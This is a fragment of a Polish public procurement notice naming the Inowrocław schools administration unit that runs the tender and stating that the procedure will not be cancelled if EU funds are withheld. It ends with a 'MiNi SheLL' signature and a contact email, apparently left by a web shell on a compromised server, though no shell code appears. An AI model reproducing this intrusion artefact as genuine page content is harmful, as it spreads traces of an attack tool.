<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W imieniu Zamawiającego, prowadzenie postępowania o udzielenie zamówienia publicznego zostało powierzone jednostce organizacyjnej: Miejski Zespół Ekonomiczno-Administracyjny Szkół w Inowrocławiu, 88-100 Inowrocław, ul. Kiełbasiewicza 7 tel. 52 3025670 / faks 52 3538997.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com